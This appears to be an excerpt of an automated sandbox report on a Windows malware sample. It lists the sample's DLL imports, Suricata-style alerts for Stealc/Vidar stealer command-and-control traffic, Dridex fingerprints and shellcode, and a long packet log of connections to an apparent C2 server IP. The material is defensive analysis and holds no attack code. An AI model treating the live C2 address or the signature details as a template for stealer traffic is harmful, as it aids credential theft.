GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T17:53:22.098195+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49715 | 40.127.169.103 | 192.168.2.6
2024-07-26T17:54:58.184294+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64186 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:45.026078+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 443 | 64179 | 5.75.212.60 | 192.168.2.6
2024-07-26T17:54:29.091020+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 64170 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:24.958434+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64168 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:32.339070+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64172 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:55:03.839325+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64189 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:28.443967+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64170 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:38.210507+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64175 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:32.999458+0200 | TCP | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 443 | 64172 | 5.75.212.60 | 192.168.2.6
2024-07-26T17:54:32.999290+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 64172 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:26.883415+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64169 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:53:44.137634+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 64166 | 40.68.123.157 | 192.168.2.6
2024-07-26T17:54:37.094243+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 443 | 64174 | 5.75.212.60 | 192.168.2.6
2024-07-26T17:54:34.845731+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64173 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:44.185245+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64179 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:48.385165+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64181 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:39.270003+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64176 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:53:42.765660+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 64165 | 40.68.123.157 | 192.168.2.6
2024-07-26T17:55:05.455054+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64190 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:46.289932+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64180 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:55:01.759091+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64188 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:55.817975+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64184 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:59.450351+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64187 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:35.007420+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64174 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:41.779288+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64178 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:40.682041+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64177 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:51.783629+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64183 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:56.797425+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64185 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:31.666423+0200 | TCP | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 443 | 64171 | 5.75.212.60 | 192.168.2.6
2024-07-26T17:54:29.989042+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64171 | 443 | 192.168.2.6 | 5.75.212.60
2024-07-26T17:54:50.224091+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 64182 | 443 | 192.168.2.6 | 5.75.212.60
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Jul 26, 2024 17:54:24.958434105 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.961278915 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.961308002 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:24.961723089 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:24.961795092 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:24.962100029 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.004518032 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.714176893 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.714369059 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.714371920 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.714446068 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.721304893 CEST64168443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.721353054 CEST443641685.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.723179102 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.723228931 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:25.723320961 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.723464966 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:25.723480940 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:26.883315086 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:26.883414984 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:26.883935928 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:26.883945942 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:26.886261940 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:26.886267900 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651540995 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651618958 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651633978 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651648998 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.651674986 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651689053 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651817083 CEST64169443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.651834965 CEST443641695.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.653563976 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.653584957 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:27.653656960 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.653933048 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:27.653944016 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:28.443862915 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:28.443967104 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:28.450239897 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:28.450247049 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:28.451929092 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:28.451932907 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091130018 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091186047 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091306925 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091329098 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091344118 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091346979 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.091408014 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091834068 CEST64170443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.091851950 CEST443641705.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.094048977 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.094149113 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.094279051 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.094547987 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.094584942 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.988846064 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.989042044 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.989456892 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.989481926 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:29.991336107 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:29.991348982 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.665920973 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.665976048 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.665999889 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666034937 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.666057110 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666080952 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666117907 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.666163921 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666388988 CEST64171443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.666409016 CEST443641715.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.667988062 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.668024063 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:31.668104887 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.668308973 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:31.668318987 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.338996887 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.339070082 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.339591980 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.339601994 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.341202974 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.341207027 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.999310970 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.999381065 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:32.999409914 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.999438047 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.999653101 CEST64172443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:32.999675035 CEST443641725.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:33.063740969 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:33.063836098 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:33.063941956 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:33.064201117 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:33.064235926 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.280920029 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.281012058 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.281172991 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.281529903 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.281564951 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.845604897 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.845731020 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.846436024 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.846462965 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.848095894 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.848109961 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:34.848151922 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:34.848192930 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.007277012 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.007420063 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.007945061 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.007972956 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.014286041 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.014300108 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449419022 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449533939 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449573994 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449618101 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.449688911 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.449721098 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.449785948 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.477912903 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.477969885 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.478140116 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.478141069 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.478209019 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.478279114 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.545553923 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.545610905 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.545722961 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.545723915 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:35.545799971 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:35.545861959 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.050899982 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.050934076 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.050961971 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.050997019 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051011086 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051053047 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051054001 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051134109 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051211119 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051211119 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051212072 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051212072 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.051234007 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.051295042 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.052057981 CEST64173443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.052098036 CEST443641735.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057746887 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057774067 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057835102 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.057857990 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.057892084 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.057912111 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.063626051 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.063647985 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.063836098 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.063851118 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.063908100 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.072124004 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.072148085 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.072216034 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.072227955 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.072253942 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.072272062 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.076546907 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.076572895 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.076618910 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.076637983 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.076661110 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.076680899 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.080923080 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.080950975 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.081041098 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.081056118 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.081109047 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.084778070 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.084801912 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.084871054 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.084882975 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.084933043 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.088191032 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.088215113 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.088264942 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.088277102 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.088305950 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.088325024 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.091722012 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.091749907 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.273416996 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.273451090 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.273457050 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.273482084 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.273493052 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.301700115 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.301729918 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.301826954 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.301861048 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.301951885 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.301951885 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.303392887 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.303417921 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.303461075 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.303467989 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.303489923 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.303518057 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.369237900 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.369265079 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.369323969 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.369342089 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.369358063 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.369400024 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.370338917 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.370358944 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.370394945 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.370400906 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.370424032 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.370443106 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.371237993 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.371263027 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.371311903 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.371316910 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.371347904 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.371361017 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.373081923 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.373105049 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.373141050 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.373146057 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.373172998 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.373181105 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.373976946 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.373997927 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.374049902 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.374057055 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.374094963 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.374939919 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.374958038 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.375034094 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.375041008 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.375082970 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.474737883 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.474771023 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.474869967 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.474895000 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.474909067 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.474941969 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.480030060 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.480062008 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.480103970 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.480112076 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.480132103 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.480156898 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.561572075 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.561599016 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.561722994 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.561742067 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.561789036 CEST64174443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:36.562400103 CEST443641745.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:36.562422991 CEST443641745.75.212.60192.168.2.6
